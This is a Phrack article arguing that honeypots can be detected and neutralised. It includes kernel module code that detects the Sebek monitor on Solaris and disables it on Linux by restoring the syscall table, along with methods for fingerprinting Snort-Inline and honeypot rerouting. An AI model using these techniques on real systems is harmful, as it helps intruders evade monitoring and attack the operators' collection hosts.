                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3e, Phile #0x07 of 0x0f

|=------------------=[ Local Honeypot Identification ]=-----------------=|
|=----------------------------------------------------------------------=|
|=------------------=[ Joseph Corey <jcorey@usa.net> ]=-----------------=|


"I pooped" - William Shakespeare


1 - Abstract

2 - Introduction

3 - Broken HoneyPots

4 - Detecting and Handling of Honeypot Devices
    4.1 - Sebek
          4.1.1 - Detecting Sebek Solaris
          4.1.2 - Detecting Sebek Linux
    4.2 - Snort-Inline And Dynamic Re-Routing
	  4.2.1 - Connection or Block Limiting
          4.2.2 - Payload Alterations
	  4.2.3 - Honey Farms
          4.2.4 - Dynamic Re-Routing (ala Bait and Switch)
	
5 - Conclusions

6 - Thanks

7 - References

--[ 1. Abstract

Honeypots and Honeynets are deployed on networks to detect and monitor 
misuse of computer and network resources by unauthorized individuals. 
Monitoring may take the form of high-interaction implementations[1], or 
low-interaction virtual honeypots[2].  The devices developed and the 
methods behind their development are based upon flawed assumptions and 
premisize, ultimately permitting a determined adversary the ability to 
detect, neutralize, and in some circumstances, exploit deployed honeypot 
devices.
 
The AntiHoney.NET alliance was established to provide a forum for research 
into the limitations of honeypot technology, and the development of proof-
of-concept tools to demonstrate the limitations of honeypot technology. The 
results of current research a presented within this paper, and the flaws in 
the concept of honeypots, which permit the discovery and exploitation of 
honeypot devices, is explored.

--[ 2. Introduction

The HoneyNET Project describes honeypots as closely monitored network
decoys that will provide soft-targets for would-be hackers to exploit.
The general hope is that attackers will take the low-hanging fruit, and
use it as a launching pad for further attacks against other, harder
targets. 

In their very essence, honeypots act as a anomaly-based intrusion
detection system. Any activity on the honeypot system is an anomoly due
to the system's dedicated purpose for trapping attackers. If an attacker
were to successfully penetrate a honeypot system, the very act of their 
interaction with the system in order to deliver the exploit or 
conduct subsequent activates after compromising the honeypot acts 
would tip off honeypot administrators due to the very presence of
activity originating or terminating at the honeypot system.

In addition to the value honeypots serve as a intrusion detection system,
honeypots may also be used as an intelligence gathering mechanism. By
luring hackers into an environment where their actions can be monitored,
honeypot researchers hope to learn how attackers behave, the motivations
behind their activities, and perhaps even capture some of the tools 
used in the active exploitation of computer systems. This purpose
was discussed in the book published by the HoneyNET project, "Know 
your Enemy"[3].

This has been of particular interest to the various intelligence 
agencies which take part in or support the mission of the Honeynet project,
evidenced by the grant from the CIA's National Intelligence Council to the 
HoneyNET project[4]. Other groups which have a documented interest in the 
intelligence gathering potential of honeynet technology include ABIN, the 
Mossad, CSIS, and w00w00. Additionally, organizations traditionally
interested in law enforcement have become interested in honeypots as
a way to detect, monitor, and collect evidence of online crimes, such
as with recent discoveries by the honeynet project of crime syndicates 
using compromised boxes to traffic in stolen credit card numbers.

The core devices for achieving this mission are Sebek, Snort-Inline, and 
honeywall cdrom[5]. Additionally, other tools and methods, such as 
HoneyD[6] and HoneyNET Farms[7], contribute to this mission, though not 
directly funded by the NIC grant, not directly funded in the NIC grant. 
We will examine each of these devices in more detail, identifying how 
an adversary can identify their presence -- and the resultant detection 
of the honeypot.  

--[ 3. Flawed Honeypot premise

Any project based upon a flawed premises will result in products no
less flawed then the premise it was based upon. This is the case with the
honeynet project, and the mechanisms that it develops. As a result of these
flawed devices being deployed by hapless security researchers, unintended
and potentially devastating results may occur. In one the 'worst case' 
scenario, misled honeypot administrators, who subscribe to the flawed premises 
of the honeynet project, may find themselves in an uncomfortable, or even
life-threatening situations if it is discovered that they are running 
a HoneyPot and that honeypot is used by Romanian organized crime 
syndicates or foreign nation-states to conduct illegal activities with 
a presumption of anonymity. 

These flawed premises are:

	1. HoneyPot Technology may be openly shared and remain effective.

        2. HoneyPot Technology may be deployed in a hostile environment,
           and remain undetected.

        3. Even if detected, Attackers will not target the honeypot or
           its operators for further exploitation.

The first premise is central to the purpose of the HoneyNET Project. The
entire purpose of the HoneyNET Project, as stated, is to develop methods
to monitor attackers and share the results of that monitoring and
the methods with the public security community. However, If an adversary
knows how they are being monitored, the adversary is able to develop methods
to determine if they are benign monitored (as we will see in section 4) or
falsify information going before the monitoring mechanisms. The publication
of product derived from the monitoring, will in itself, also provide the
adversary information on how they are being monitored [Waltz].

Because of the fallacy of the first premise, the second premise is also flawed.
Assuming an adversary knows they are being monitored, then it must be assumed
that a determined adversary will study the ways that the monitoring devices
operate. Any flaw in the way the devices operate, and how they are concealed
from the adversary under normal conditions would be then uncovered. By
creating these conditions in the wild, an adversary can then test for the
presence or absence of the monitoring mechanisms.

And finally, the third flawed premise. If an adversary knows a monitoring
device is present, it is only a little further for the adversary to go 
to be able to disable or turn the device to their own designs. If the
discovered flaws are of such a nature where the adversary can cause arbitrary
code execution, either as a result of the device or one of its supporting
code libraries, then the attacker may be able to compromise the supporting
systems that monitor the honeypot, and any other honeypots which trust that
supporting system.

 
--[ 4. Detecting and Handling of Honeypot Devices

Finding Honeypots is an art in itself. The whole of the purpose of the
honeypot is to covertly monitor the activities of a target audience, who
are technically skilled and are likely able to manipulate and query any
resources attached to the honeypot itself.  To these ends, honeypot
technology development mirrors closely the development of rootkits --
another technology whose purpose is to hide their presence from an
omni-powerfull user on a target computer system. In deploying honeypot
technology modifications are made to a configured system and its network
to monitor activity, limit possible damage that can be caused from the
honeypot, and to conceal the presence of the previous two activities.

The Acme of skill in finding honeypots is to simply to find the
differences between a real system and a honeypot representation of a
system, subtle as they may seem. You see, the act doping the box in
order to conceal the monitoring and reporting mechanisms is, in itself,
a modification to the structure of the system that can and will be
found. We will discover not only some current methods to find and expose
honeypots, but how we can approach the problem when these signatures are
inevatably eliminated. 

----[ 4.1 Sebek 

Host Based Honeypot monitoring technology is focused on capturing and
preserving tools used on the honeypot and the actual activity on the
system by the monitored individual.  Typically the strategy has
been to dope the shells or other software running on the target system
in order to permanently save the commands executed by individuals operating
on the system. The ultimate form of this type of monitoring device is kernel
based modifications. The current and most sophisticated honeypot monitoring
device is the Sebek kernel module. In addition to capturing keystrokes,
it has been written as to be able to capture files as they are copied across
encrypted tunnels with the secure copy command.

Current avenues for discovering the presence of Sebek can be classified
as attacks against how sebek intercepts user input, and how it conceals
its communications with the back-end collection server. 

In order to be able to collect keystrokes from interactive users on a
monitored system, sebek hooks the system calls specific to reading in
input. As we will see, the very act of hooking into these system calls
leaves a footprint that can be checked, and in some situations, reversed
in order to disable the sebek monitoring capacity.

The backend communications to the server use specific features of the
communication packets in order to filter out the communications from the
view of a privileged user on the monitored systems. We will see that
it will be possible to generate traffic in a controlled fasion as
to be able to discover the patters that are being filtered. 

Before going further, it is suggested that the reader grab a copy the
versions of Sebek from the honeynet website for review during the following
discussion. Sebek can be downloaded from the HoneyNET Toolz Armory
at http://www.honeynet.org/papers/honeynet/tools/index.html

------[ 4.1.1 Detecting Sebek Solaris

Solaris was the second operating system supported by Sebek. In order
to detect sebek we will want to focus on the initialization of the
sebek. On the Solaris platform that is done with the following code:

----Code Snippet of client/sebek.c in sebeksol-2.04.07---

     1	    /*
     2	     * Save the old values.
     3	     */
       

     4	    old_read = (int64_t (*)()) sysent[SYS_read].sy_callc;
     5	#ifdef sparc
     6	    old_read32 = (int64_t (*)()) sysent32[SYS_read].sy_callc;
     7	#endif
     8	    old_spec_ioctl = spec_vnodeopsp->vop_ioctl;
       

     9	    /*
    10	     * Switch to critical to reduce the risk of races and swap the
    11	     * function pointers.
    12	     */
       

    13	    s = ddi_enter_critical();
       

    14	    sysent[SYS_read].sy_callc = (int64_t(*)())new_read;
    15	#ifdef sparc
    16	    sysent32[SYS_read].sy_callc = (int64_t(*)())new_read;
    17	#endif
    18	    ddi_exit_critical(s);
       
----Code Snippet of client/sebek.c in sebeksol-2.04.07---

First, notice how sebek handles the sysent32 syscall table and the
old_read32 sys call table. It is obvious that this code has not been
strenuously tested. If it were exercised on 32 and 64 bit systems, they
would have found that it will not work on UltraSparc systems running a
32bit kenrel (ie, an Ultra Sparc systems with 143mhz cpus, where solaris
defaults to running in 32bit mode). 

-But I digress. Poor coding software testing is not the point of this
-article. 
Notice how the kernel module replaces the sy_callc with a
function pointer on line to the function in sebek on line 14 and 16? ?
Thats a signature right there. 
- What? You don't follow? Let me explain.

Typically, the SYS_read and SYS_write system calls are close to each
other. Since we can inspect the sysent (and sysent32) tables, we can
compare those two system calls to each other. 

For example, here is the output of a modified sebek.c file that outputs
the offsets of the sysent[] entries for SYS_write, and SYS_read. Notice
how the value of SYS_read changes.


SYS_WRITE              : 0x100abfc8
 
SYS_READ  WithOut Sebek: 0x100abc14
 
SYS_READ    With Sebek : 0x1028951c

Notice the difference between the positions of the functions? In the
clean sun kernel, prior to loading sebek's read system call, , the
difference is 0x3b4, but in the sebek kernel the difference is over
0x200000! That is about as subtle as finding a dead hooker next too you
in bed.

The following module can be used in solaris to test for the presence 
of Sebek:

----End--------------Sebek-Find-Solaris.c-----------------------------
/*
 * Detect Sebek Running on Solaris Systems.
 * Adapted from the Sebek Solaris kernel module.
 *
 * Copyright 2003, Phrack Labs
 *
 */
#ifdef __GNUC__
#define _SYS_VARARGS_H
#define _VARARGS_H
#include <stdarg.h>
#endif

#include <values.h>
#include <inttypes.h>
#include <sys/types.h>
#include <sys/conf.h>
#include <sys/vnode.h>
#include <sys/file.h>
#include <sys/cred.h>
#include <sys/stream.h>
#include <sys/strsubr.h>
#include <sys/stropts.h>
#include <sys/systm.h>
#include <sys/pathname.h>
#include <sys/exec.h>
#include <sys/thread.h>
#include <sys/modctl.h>
#include <sys/syscall.h>
#include <sys/errno.h>
#include <sys/ddi.h>
#include <sys/sunddi.h>
#include <sys/autoconf.h>
#include <sys/dirent.h>
#include <sys/kmem.h>
#include <sys/mem.h>
#include <sys/bootconf.h>
#include <sys/reboot.h>
#include <sys/vmparam.h>
#include <sys/var.h>
#include <sys/regset.h>
#include <sys/procfs.h>
#include <sys/tihdr.h>
#include <sys/socket.h>
#include <sys/sockio.h>
#include <sys/fs/ufs_inode.h>
#include <sys/fs/snode.h>
#include <sys/proc/prdata.h>
#include <sys/dlpi.h>
#include <sys/corectl.h>
#include <sys/sad.h>

#if SOL_MINVER >= 6
# include <net/if_types.h>
#endif
#include <net/af.h>
#include <net/route.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip6.h>
#include <sys/byteorder.h>

#include <net/if.h>
#include <inet/common.h>
#include <inet/ip.h>
#include <inet/mib2.h>
#include <inet/tcp.h>

#ifdef __sparcv9
#include <v9/sys/privregs.h>
#endif

#if defined(__sparcv7) || defined(__sparcv8)
#include <v7/sys/privregs.h>
#endif


/* Module description */
static struct modlstrmod modlstrmod = {
  &mod_strmodops,
  "aha-sebek",
  &fsw
};

static struct modlinkage modlinkage = {
    MODREV_1, {(void *) &modlstrmod, NULL}
};

/*
 * Structure of the system-entry table.
 */
extern struct sysent sysent[];

static struct modctl *my_mp = NULL;

int _init(void)
{

    unsigned int a;

    a =	(unsigned long) sysent[SYS_write].sy_callc -
     (unsigned long) sysent[SYS_read].sy_callc; 

    if (a > 0x00002000)
      cmn_err(CE_WARN,"NOTICE: Possible HoneyPot Detected.\n");
        
   return (mod_install(&modlinkage));
}

int _fini()
{
    return (mod_remove(&modlinkage));
}

int _info(struct modinfo * modinfop)
{   
    return (mod_info(&modlinkage, modinfop));
}

----Begin------------Sebek-Find-Solaris.c-----------------------------


------[ 4.1.2 Detecting Sebek Linux

In linux, the situation is exactly the same. But with one sweet
modification -- in more recent kernels the sys_read function is an
exported symbol. Because it is exported, there sebek can even be
disabled! To understand why, one has to understand recent changes in the
linux kernel.

During the development of the linux 2.5.x kernels, it was decreed that
the sys_call_table will no longer be exported as a symbol to kernel
modules. On the surface this would appear to hinder modules such as
sebek which use the sys_call_table. However, when some of those patches
were being back ported into the 2.4 tree, workarounds to finding the
sys_call_table in memory quickly appeared. 

Some system calls are necessary for some kernel modules to operate. It
is handy from a kernel module perspective to be able to read in and
write files during load and operation. To make this possible, even with
the un-exported sys_call_table, the symbols for some previously
un-exported system calls were exported. Amongst those were sys_open,
sys_close, sys_write, and sys_read. 

Now, knowing where sys_read is in memory is important, because that
means that if one were to use the same sys_call_table finding methods
that appeared on the scene, combined with the differiental analysis of
sys_call_table pointers, one could determine that the sys_read function
had been replaced and repair the sebek'd kenrnel by replacing the value
in the sys_call_table with the original (exported) sys_read value.

Below is some code someone left out on their web server that can easily
remove sebek from sebek-infected kernels:


--unsebek.c---

#define MODULE
#define __KERNEL__
#include <asm/unistd.h>
#include <linux/sys.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <sys/syscall.h>
#include <linux/types.h>

extern int loops_per_jiffy;

int init_module(void)
{

	struct module *mod_ptr;
	unsigned longg ptr;
	unsigned long **sct;

	MODULE_LICENSE("GPL");

	lock_kernel();

        /* How Gay, hiding the system call table.  This block just 
           finds it.
         */

	for (ptr = (unsigned long) &loops_per_jiffy;
		ptr < (unsigned long) &boot_cpu_data; ptr += sizeof(void *))
	{

		unsigned long *p;
		p = (unsigned long *)ptr;

		if (p[__NR_close] == (unsigned long) sys_close) {
			sct = (unsigned long **)p;
			break;
		}
	}

	/* Uber 31337 Sebek disabling code begins here. */

	sct[__NR_read] = (unsigned long *) sys_read;

        /* Uber 31337 Sebek disabling code ends here. */

	unlock_kernel();
	return 0
}

int cleanup_module(void)
{
	return 0;
}

----unsebek.c---

Thats it! This module is even safe to run on systems that are not
infected with sebek. All it does is assign the same value stored in the
sys_call_table's __NR_read slot back to itself.

After disabling sebek, no keystrokes or ssh transfers will be captured.
For some added fun, one could entend the module to determine if the
sys_read value matches whats in the sys_call table. Once its know sebek
is present, one can find the MAC address the remote sebek sniffer is
running with and exploit a vulnerability in the software to control the
data collection host.

----[ 4.2 - Snort-Inline And Dynamic Re-Routing

Running a high-interaction honeypot can be a perilous feat. What if
someone compromises the honeypot system and uses it to launch a massive
attack against a high-profile target, like www.ebay.com? Would the
honeypot administrator be liable for negligence in leaving a unsecured
system connected to the network? Questions like these are what keep
honeypot alliance members up at night. In order to give some cover, and
make an argument of due diligence, the use of a product dubbed
snort-inline is used by the HoneyNET alliance to limit the ammount of
damage that can be caused from a compromised honeypot. 

Snort-Inline is based off of the wildly popular, and somewhat stolen,
Intrusion Detection system called Snort. The purpose of Snort-Inline
is to monitor on-going traffic and respond to that traffic in real-time.
The HoneyNET project typically either uses this responsive capability
to limit the number of outbound connections on a honeypot, or to alter
outgoing packets that are detected to be associated with an attack being
launched from the honeypot. Both of these activities are not very subtle,
and may be detected. 

------[ 4.2.1 Connection Limiting

This is perhaps one of the most easy things to detect. In the Connection 
limiting configuration, snort-inline will count the number of outbound
connections within a peroid of time, and deny new outbound connections
when a minimum threshold is reached. 

To detect this, simply open up a good number of outbound connections
to several hosts. A good list of 10-20 high-profile websites is
recommended. A manual connection with a basic retrieval of their
main webpage will suffice to provide the connections while appearing
benign at the network level. 

Duh.

------[ 4.2.2 Payload Alterations

Even if an attacker is able to connect out to one other host, it may 
be possible for that one host to be the mega high-profile target that
will cause the wrath of Homeland Security to reign down upon the
honeynet administrator like Microsoft's SWAT team taking down the
author of a crappy variant of Blaster. Because of this, the other 
feature of Snort-Inline was developed. Using snort rules to detect
certain substrings in outgoing traffic, Snort-Inline will modify
outbound packets that it believes to be of an exploitive nature
in such manner as to cause the exploit to fail. One oft-cited example
is the modification of shellcode attempting to execute "/bin/sh" to 
"/ben/sh". 

Phrack Labs has studied this situation carefully. The answer we 
found is actually based upon one of the products developed
for the HoneyNET Project. Using a honeyd server, custom scripts are
written to simulate a exploitable service. However, instead of actually
looking for service commands, at the point where a payload should
be delivered, the server will compute a hash of various portions
of the payload, and return a response based upon the result of the
hash.

By comparing the benign return message to what is expected, 
it is possible to determine if snort-inline is present and modifying
payloads. If modified payloads result, it is highly likely the
suspect system is a honeypot.

------[ 4.2.3 Honey Farms

The idea of honey farms is perhaps the most marketable idea that 
has come out of the HoneyNET Project. The concept is a that a company 
would pay the operator of a HoneyNET farm to run and maintain honeypots 
for the client company. IP addresses within the client company would be 
assigned to the HoneyNET Farm, and traffic to those ip addressed would be 
transparently bridged across a VPN to the Honey Farm Network Opperations 
Center, where a crack staff would study the every move of villainous
hackers that threaten the client network. 

Without getting into too much of a discussion of the high-tech
wizardry that goes into setting up a Honey Farm configuration, we will
simply point out that the latency between an attackers machine and the
honeyfarm will very from the latency between an attacker's machine and
other systems located on the client network and on the same broadcast
domain as the honeyfarm systems. If the honeyfarm is isolated in its
own broadcast domain, and routing is performed, the latency may be
of less of an issue for multi-site and geographically spread-out
networks.

The measurement of this latency will occur outside of the bounds
of the communication channel between the honeyfarm and the attacker.
Specificly, the clock on the wall of the attacker. Because this
measure is out of bounds of the communication between the two
parties, there is little if anything that can be done from
the point of the honeyfarm to be able to hide this telling
anomoly. 

------[ 4.2.4 Dynamic Re-Routing (ala Bait and Switch)

The problem with honeypots is that they are not intresting targets
in and of themselves. You'll likely not find a production honeypot
running as a production server, unless your looking at ISS's network.
Honeywall, and the project the idea was based upon, Bait-n-Switch,
work to modify the flow of network packets normally targeted at a 
producion server over to a honeypot at the first sign of anomolous
behavior. 

For example, if windowsupdate.microsoft.com had a honeywall in front
of them, the first time it saw a webdav request, it would forward
all traffic from the nsecure.com host attacking it to the honeypot.

Its a neat idea -- fronting high-profile and high-value targets with
honeypots. However, the idea is flawed.

The honeypot will have to be isolated from production system. This is
to ensure that the honeypot is not used as a launching platform to
infect production systems. This means that the honeypot will have to
mimic the state of the production system, without any input from
the production system beyond when they were last manually synchronized
with each other. 

These differences in state between a normally busy production box
and a normally idle (excluding simulated traffic) honeypot provides
a multitude of signatures that can be used to identify the 
re-routing to a honeypot. 

Assume an attacker controls two systems. System A will be used for
attack. System B will be a control system, that will only make normal
(legitimate) connections to the production system. Further, Assume
system A has already triggered the suspicions of the IDS controlling
the Honeywall. For the sake of this, lets assume that both the production
system and the honeypot are running Windows 2000 server with IIS.

If the attacker just monitored the IPIDs coming from the honeypot and
the production server he would see that they do not match. Further, 
the IPIDs would likely fail to increment for the samples taken by
System A then they would for System B. 

These samples can be taken remotely, and definitively reveal that
someone is playing some routing games for connections coming from 
System A.

--[ 5. Conclusions

The effectiveness of honeypot technology only exists as long as the 
opponents to to the purpose of the honeypot are not able to examine 
the workings of the monitoring and control technologies. Essentially,
the honeypot technologies must remain secret in order for them to be
effective in the field. This precludes the option of having
an open discourse on the technology, since one can't even trust the
alliance members not to leak 0day Honeypot Warez to their blackhat friends. 

On the other hand, without open discourse, honeypot development will
stall, no media attention will be given to the false prophets of honeypot
technology, and the lucrative contracts that come with selling digital
snake oil[XX] will not materialize. 

In either circumstance, HoneyPot Techology is far too immature to be
seriously considered for real deployment by anyone other then academics
and dot-com refugees.

--[ 6. Thanks

A Special Thanks to K2 for his support in keeping up with what
is going on in the honeynet project. Keep those Emails Coming!

--[ 7. References

Too May to Mention. 




|=[ EOF ]=---------------------------------------------------------------=|
